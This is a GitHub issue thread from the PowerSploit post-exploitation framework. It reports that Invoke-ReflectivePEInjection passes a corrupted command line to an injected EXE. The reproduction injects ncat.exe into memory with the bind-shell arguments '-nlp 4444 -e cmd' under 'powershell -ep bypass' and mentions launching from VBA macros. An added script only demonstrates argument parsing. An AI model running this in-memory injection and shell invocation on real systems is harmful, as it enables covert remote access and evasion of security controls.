PowerShellMafia / PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework

Invoke-ReflectivePEInjection -ExeArgs does not sweep previous CommandLine #281

Open mgeeky opened 6 years ago

mgeeky commented 6 years ago

Hello there,

I'd like to report an issue with the code handling the buffer juggling around the process' command line. When PowerShell gets executed with some of its own arguments, like powershell -ep bypass, the process' own command line joined with the one produced from parsing -ExeArgs leads to undefined behaviour and a corrupted command line.

Here's the example:

  1. Start up the PowerShell interpreter like so: powershell -ep bypass
  2. Invoke Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd"
  3. The PE image being injected is the classic ncat.exe coming straight from nmap.org.
  4. The resulting verbose output is:
PS C:\Users\IEUser\Desktop> .\decoded.ps1
VERBOSE: PowerShell ProcessID: 6076
VERBOSE: Calling Invoke-MemoryLoadLibrary
VERBOSE: Getting basic PE information from the file
VERBOSE: Allocating memory for the PE and write its headers to memory
VERBOSE: Getting detailed PE information from the headers loaded in memory
VERBOSE: StartAddress: 0x0AAC0000    EndAddress: 0x0AB2D000
VERBOSE: Copy PE sections in to memory
VERBOSE: Update memory addresses based on where the PE was actually loaded in memory
VERBOSE: Import DLL's needed by the PE we are loading
VERBOSE: Done importing DLL imports
VERBOSE: Update memory protection flags
VERBOSE: Call EXE Main function. Address: 0x0AB04C04. Creating thread for the EXE to run in.
Ncat: Could not resolve hostname "bypass": The requested name is valid, but no data of the requested type was found. . QUITTING.
VERBOSE: EXE thread has completed.
VERBOSE: Done!
PS C:\Users\IEUser\Desktop>

Now, one can clearly observe that ncat complains about its inability to resolve the host "bypass". This must be an issue with the EXE args being appended to the original process' command line, or the fact that the original process' command line has not been zeroed out beforehand, or something.

The exact invocation is kinda like:

# Assumes Invoke-ReflectivePEInjection.ps1 from PowerSploit sits in the current directory
. .\Invoke-ReflectivePEInjection.ps1
# ncat.b64 holds the base64-encoded ncat.exe; -Raw keeps it as one string
$ncat = Get-Content $env:temp\ncat.b64 -Raw;
$PEBytes = [System.Convert]::FromBase64String($ncat);
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "-nlp 4444 -e cmd" -Verbose

The same behaviour goes for other invocations, like from VBA macro code leveraging Shell("[...] powershell -ep bypass -file decoded.ps1").
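As an added illustration (this is not code from the issue or from PowerSploit), the following PowerShell reproduces what argv an injected EXE's C runtime would derive from each command-line buffer state the report hypothesises: the untouched PowerShell command line, the original with the -ExeArgs string appended, and an overwrite of the old buffer that is neither zeroed nor NUL-terminated, beside a cleanly replaced string. It uses the Windows parser itself (CommandLineToArgvW) so the split matches what a real CRT does. The sample original command line, the "ReflectiveExe" argv[0] placeholder and the unterminated-overwrite model are assumptions made for the demo.

```powershell
# Added example, not PowerSploit code: show what an injected EXE's C runtime sees
# as argv for each command-line buffer state. CommandLineToArgvW is the Windows
# parser, so the split matches a real CRT rather than a hand-rolled one.
Add-Type -Namespace CmdLineDemo -Name Native -MemberDefinition @'
[DllImport("shell32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern IntPtr CommandLineToArgvW(string lpCmdLine, out int pNumArgs);

[DllImport("kernel32.dll")]
public static extern IntPtr LocalFree(IntPtr hMem);
'@

function ConvertTo-Argv {
    # Split a command-line string exactly as the Windows parser does.
    param([Parameter(Mandatory)][string]$CommandLine)
    $count = 0
    $argvPtr = [CmdLineDemo.Native]::CommandLineToArgvW($CommandLine, [ref]$count)
    if ($argvPtr -eq [IntPtr]::Zero) {
        throw "CommandLineToArgvW failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $argv = for ($i = 0; $i -lt $count; $i++) {
            $strPtr = [Runtime.InteropServices.Marshal]::ReadIntPtr($argvPtr, $i * [IntPtr]::Size)
            [Runtime.InteropServices.Marshal]::PtrToStringUni($strPtr)
        }
        return @($argv)
    }
    finally {
        [void][CmdLineDemo.Native]::LocalFree($argvPtr)
    }
}

function Invoke-UnterminatedOverwrite {
    # Model (assumption, not PowerSploit's actual code path): write the new command
    # line over the old buffer without zeroing the rest or writing a NUL. A C-string
    # reader keeps going until the first NUL, so whatever the old line had past the
    # new text survives and is glued onto it.
    param([Parameter(Mandatory)][string]$Original, [Parameter(Mandatory)][string]$Replacement)
    $buffer = $Original.ToCharArray()
    $n = [Math]::Min($buffer.Length, $Replacement.Length)
    [Array]::Copy($Replacement.ToCharArray(), $buffer, $n)
    return -join $buffer
}

# Constructed inputs mirroring the report. 'ReflectiveExe' as argv[0] is an
# arbitrary placeholder chosen for this demo.
$original    = 'powershell -ep bypass -file decoded.ps1'
$exeArgs     = '-nlp 4444 -e cmd'
$replacement = "ReflectiveExe $exeArgs"
$expected    = @('ReflectiveExe', '-nlp', '4444', '-e', 'cmd')

$cases = [ordered]@{
    'untouched original'     = $original
    'original + ExeArgs'     = "$original $exeArgs"
    'unterminated overwrite' = Invoke-UnterminatedOverwrite -Original $original -Replacement $replacement
    'replaced, terminated'   = $replacement
}

foreach ($name in $cases.Keys) {
    $argv = ConvertTo-Argv -CommandLine $cases[$name]
    # Only the last case yields exactly the argv the operator asked for; the first
    # two still carry "bypass" as a positional token, the third ends in "cmdcoded.ps1".
    $isExpected = ($argv -join "`0") -eq ($expected -join "`0")
    '{0,-22} ok={1,-5} argv: {2}' -f $name, $isExpected, ($argv -join ' | ')
}
```

Run it from any PowerShell prompt on Windows; no injection takes place, the script only parses strings. The check worth keeping is the comparison against $expected: whatever mechanism a loader uses to hand the EXE its arguments, feeding the resulting buffer through CommandLineToArgvW before calling the entry point tells you whether leftovers of the host process' command line (here the "bypass" token ncat tried to resolve) will reach the payload's argv.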

jammys commented 6 years ago

Any idea on how to fix it? The same problem occurs on my VM (Windows 10 x64).

mgeeky commented 6 years ago

I've proposed my solution in PR #280.